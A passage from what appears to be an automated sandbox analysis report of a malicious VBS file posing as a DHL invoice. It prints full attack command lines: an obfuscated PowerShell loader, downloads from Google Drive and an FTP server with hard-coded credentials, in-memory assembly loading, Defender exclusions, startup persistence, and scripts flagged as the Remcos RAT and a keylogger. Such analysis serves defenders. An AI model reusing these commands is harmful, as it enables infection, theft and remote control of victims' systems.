'pAG8AagAtACgALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAaw' + [char]66 + 'yAG8Adw' + [char]66 + '0AGUATgAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbwAtAHcAZQ' + [char]66 + 'uACAAPQAgAHMAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7AGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7AH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACwAQg' + [char]66 + 'LAEwAUg' + [char]66 + 'VACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAcg' + [char]66 + 'kAHoAeQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'nAHIAZA' + [char]66 + '6AHkAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'nAHIAZA' + [char]66 + '6AHkAJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAHEAcQ' + [char]66 + 'sAHIAcgAkACgAIAA9ACAAcQ' + [char]66 + 'xAGwAcg' + [char]66 + 'yACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAcQ' + [char]66 + 'xAGwAcg' + [char]66 + 'yACQAKAAgAD0AIA' + [char]66 + 'xAHEAbA' + [char]66 + 'yAHIAJA' + [char]66 + '7ACAAKQAgAEQAVw' + [char]66 + 'nAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHEAcQ' + [char]66 + 'sAHIAcgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJA' + [char]66 + '7ACAAKQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAOwA=';$hsdzv = $qKKzc; ;$hsdzv = $qKKzc.replace('???' , 'B') ;;$qqbfx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hsdzv ) ); $qqbfx = $qqbfx[-1..-$qqbfx.Length] -join '';$qqbfx = $qqbfx.replace('%XRqhI%','C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs');powershell $qqbfx
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:00:16:59
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:00:17:01
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:00:17:08
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:00:17:08
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:00:17:08
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:00:17:09
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1"
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:00:17:09
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x22.ps1"
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:00:17:11
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff693ab0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:13
                                                                                                Start time:00:17:20
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1"
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:14
                                                                                                Start time:00:17:20
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:17
                                                                                                Start time:00:17:23
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:18
                                                                                                Start time:00:17:23
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:19
                                                                                                Start time:00:17:23
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:20
                                                                                                Start time:00:17:23
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:21
                                                                                                Start time:00:17:24
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x970000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:22
                                                                                                Start time:00:17:26
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x80000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:23
                                                                                                Start time:00:17:26
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x940000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:24
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
